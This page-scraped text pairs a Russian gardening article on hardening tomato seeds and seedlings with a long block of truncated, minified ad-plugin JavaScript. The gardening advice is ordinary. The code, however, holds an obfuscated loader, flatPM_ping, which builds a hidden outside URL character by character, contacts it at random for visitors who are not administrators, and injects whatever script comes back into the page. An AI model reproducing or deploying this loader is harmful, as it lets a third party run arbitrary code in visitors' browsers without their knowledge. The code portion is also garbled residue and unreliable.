Обычно начинающие огородники упускают этот момент, и высевают семена сразу в грунт, в лучшем случае предварительно дезинфицируют их и выдерживают в растворе стимуляторов роста. Но опытные огородники не упускают возможности закалить семена, зная, что из таких семян всходы прорастут быстро и дружно, а растения будут расти белее крепкими и здоровыми.

Начнем с того, что для выращивания рассады помидор лучше подходят семена 2-3 годичной давности, а не свежие. Если же альтернативы свежим семенам нет, то их желательно немного «состарить». Для этого семена высыпают в холщовый мешочек и устраивают на 2-3 недели в теплое место.

В старину в крестьянских избах хозяйки клали их на печку. Сегодня же, поскольку настоящая русская печь даже в деревнях не во всякой избе есть, не говоря уже о городских квартирах, то ее вполне можно заменить обычной батареей.

Непосредственно перед проращиванием семена помидор закаляют перепадом температур: сначала выдерживают 2 часа в горячей (около 50°С) воде, а затем на 2-3 минуты окунают в холодную. Слегка подсушив, их можно высевать на рассаду.

Есть и более сложный в исполнении, но и более эффективный способ закалки семян. Сверху на неглубокую миску кладут кусок чистой ткани. Его ширина должна соответствовать диаметру миски, а длина должна быть вдвое больше.

В миску на ткань высыпают семена томатов и разравнивают в один слой. Затем перегибают ткань пополам, накрывая ею уложенные семена, и наливают 1-1,5 см воды. В таком положении семена 24 часа находятся при комнатной температуре, а затем на такое же время отправляются в холодильник.

Такой двухдневный цикл закалки повторяют еще 2-3 раза, контролируя, чтобы в холодильнике поддерживалась температура около 2°. Температуру определяют по состоянию воды в миске: если по бокам образовалась тонкая корочка льда, значит, все нормально, если же вода начинает полностью замерзать, то в холодильнике слишком холодно, нужно отрегулировать температуру.

Есть еще один похожий способ закалки семян. Семена высыпают в холщовый мешочек, кладут его в глубокую миску или литровую кружку, сверху засыпают снегом и оставляют на подоконнике в ожидании, пока снег растает. Как только это случится, и температура талой воды достигнет 16-17°С, воду сливают, и все повторяют сначала. Слив второй раз воду, семена можно высевать на рассаду.

Температурный режим закалки

Как и организм человека, организм рассады томатов тоже нужно закалять правильно. Начинать регулировать температурный режим помидорной рассады нужно через 4-5 дней после появления всходов, иначе рассады быстро пойдет в рост и вытянется, «перерастет».

Для роста и развития здоровой рассады в помещении рекомендуется поддерживать температурный режим воздуха. В первую неделю роста рассады дневную температуру нужно поддерживать в пределах 13-16°С, ночную — 11-13°С.

В дальнейшем, до начала закалки рассады температуру днем поддерживают в диапазоне 18-22°С, а ночью — 17-18°С. После появления второго настоящего листочка ночную температуру нужно снизить до 10-13°С.

После этого до начала закалки и в ее первые дни ночной температурный режим не меняется. За неделю до предполагаемой высадки ночную температуру нужно постепенно понижать, чтобы за 3-4 дня перед высадкой она постепенно сравнялась с уличной.

По той же схеме нужно понижать и дневную температуру, только еще медленнее. Начинать закалять рассаду помидор нужно не раньше, чем за 2 недели до высадки и не позже, чем за 1,5 недели. В первом случае растение из-за перебора низких температур затормозит свой рост и будет ослабленным при пересадке в почву. Во втором — рассаде не удастся обеспечить плавное снижение температуры, и растения будут испытывать лишний стресс.

Способы

Традиционно, за 1,5-2 недели до высадки начинают процедуру собственно закалки. За неделю до начала процедуры закалки помидоры перестают поливать. Рассаду выносят из комнаты в прохладное помещение. Хорошо для этого подходит веранда или закрытый балкон. Для начала закалки выбирают теплый солнечный день.

В первые дни растения выносят спустя 2-3 часа после восхода солнца, когда температура на дворе поднимется выше 10°С, и сразу же после его захода заносят обратно. С каждым последующим днем время пребывания в неотапливаемом помещении увеличивают на 2-3 часа.

Спустя 5-6 дней с начала закалки рассаду помидор начинают выносить на улицу. В первый день пребывание на открытом воздухе лучше ограничить 1-2 часами. На второй день этот интервал увеличивают до 3-4 часов, на третий до 7-8, на четвертый ее можно оставлять на улице на весь световой день.

За 3-4 дня до высадки, если позволяет погода, рассаду оставляют ночевать на улице. Если ночью сохраняется угроза заморозков, то помидоры нужно возвратить в помещение, соответственно перенеся их высадку в открытый грунт. Высаживать рассаду, которая простояла на открытом воздухе меньше 3 суток, опасно — она может приболеть.

Существует и другой, быстрый способ закаливания рассады помидор. Рассаду помещают на 1 час в холодное помещения с температурой около 0°С. Спустя 4-5 дня процедуру повторяют, увеличивая время пребывания до 3-4 часов, а за 3-4 дня до высадки повторяют в третий раз, снова выдерживая в холоде 3-4 часа, но понизив температуру до -2°С.

При ветряной погоде за схожей схемой проводят закалку рассады томатов ветром. Этот способ можно применить, если из-за плохой погоды нет возможности провести традиционную закалку растений на улице.

Все же нужно понимать, что оба эти способы довольно экстремальны, и заранее предсказать, как поведет себя под воздействием ветра или низких температур рассада, невозможно. Поэтому лучше не рисковать и закалять рассаду традиционным, более надежным способом.

Вне зависимости от способа закалки, на протяжении всего времени ее проведения за рассадой нужно тщательно наблюдать, отслеживая малейшие изменения. Особенно это актуально в первые дни, когда реакцию рассады на изменение условий роста предсказать невозможно.

Если заметите, сто рассада начала бледнеть или увядать, растения нужно возвратить в привычную для них обстановку, подлечить, а затем продолжить их закаливание.

Особенности закалки рассады помидор в теплице

Закаливание помидор в теплице проводят по той же схеме, что и закалку комнатной рассады, но, поскольку рассаду с теплицы нельзя перенести на открытый воздух, то в этом процессе есть свои технологические особенности.

За две недели до высадки в теплице начинают понижать температуру и уменьшать частоту и интенсивность поливов. За неделю до высадки рассады на постоянное место поливы нужно полностью прекратить.

В первые 2-3 дня закалки запускают в теплицу воздух через открытую дверь. Начиная с 3-4 дня, понемногу поднимают пленку по бокам теплицы — сначала на 25-30 см и удерживают ее так 4-5 часов, затем постепенно поднимают пленку выше и увеличивают интервал поднятия. За 3-4 дня до высадки пленка с теплицы должна быть полностью снята.

Как и при закалке рассады из помещения, в начале процедуры нужно внимательно наблюдать за реакцией рассады на изменение условий роста. Если рассада начинает увядать, нужно опустить пленку, восстановить здоровье рассады, а затеи повторить процедуру закалки.

Как отличить закаленную рассаду?

Все же большинство огородников, особенно среди дачников, предпочитают не тратить время и силы на выращивание собственной рассады, а покупать ее. Чтобы при покупке не ошибиться и не купить незакаленную рассаду помидор, нужно знать некоторые визуальные особенности, которыми растения «награждает» правильная закалка.

Закаленные и незакаленные растения отличаются по цвету. У закаленной рассады он будет темно-зеленый с заметным фиолетовым отливом, а незакаленная рассада будет изумрудно-зеленого цвета. Также у закаленной рассады не только стебли, но и листья сплошь покрыты пушистыми ворсинками.

Стебли у закаленной рассады толстые, крепкие, у 20-25 см растений не прогибаются, если держать их на весу в горизонтальной плоскости. Не стоит покупать переросшую рассаду, даже если продавец уверяет, что она закалена по всем правилам — чем выше растение, тем труднее ему прижиться на новом месте. Следовательно, вам придется потратить больше времени и сил на после посадочный уход, а результат все равно может получиться нулевой.

Если вы купили рассаду, но сомневаетесь в том, что она прошла процедуру закалки, проведите ее сами. Возьмите тазик, наберите в него до половины объема земли, аккуратно разложите рассаду корнями внутрь тазика, сверху так же аккуратно присыпьте землей почти до самого верху и полейте водой. Оставьте тазик с рассадой на 3-4 дня в прохладном помещении, а затем уже высаживайте ее на грядки.

Если на дворе стоит хорошая погода и ночами не ожидается заморозков, можно просто на 3-4 дня прикопать купленную рассаду где-то в тени под деревом, а потом уже высаживать ее «по месту прописки».

Закалка рассады помидоров — тот агрономический прием, которым никогда нельзя пренебрегать, как бы вам не хотелось ускорить высадку рассады. А помидоры за ваше терпение обязательно порадуют вас щедрым урожаем.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};